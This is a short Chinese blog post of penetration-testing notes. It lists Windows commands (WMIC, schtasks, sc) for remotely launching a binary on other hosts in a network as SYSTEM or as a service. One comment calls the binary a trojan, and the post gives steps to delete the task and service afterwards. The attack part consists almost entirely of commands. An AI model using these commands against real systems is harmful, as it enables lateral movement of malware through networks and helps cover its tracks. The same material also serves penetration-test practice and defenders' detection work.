内网渗透的一些小总结（长期更新）

WMIC远程运行命令

wmic /node:host /user:administrator /p 密码 process call create “c:\windows\temp\foobar.exe”

schtasks计划任务远程运行

schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe /sc once /st 00:00 /S host /RU System

schtasks /run /tn foobar /S host

schtasks /F /delete /tn foobar /S host ##清除schtasks

SC添加服务远程运行命令

sc \\host create foobar binpath=“c:\windows\temp\foobar.exe” ##新建服务,指向拷贝的木马路径

sc \\host start foobar ##启动建立的服务
sc \\host delete foobar ##完事后删除服务

posted @ 2015-10-24 13:16 Hookjoy 阅读(410) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

err0">

你真的够努力吗？

内网渗透的一些小总结（长期更新）

公告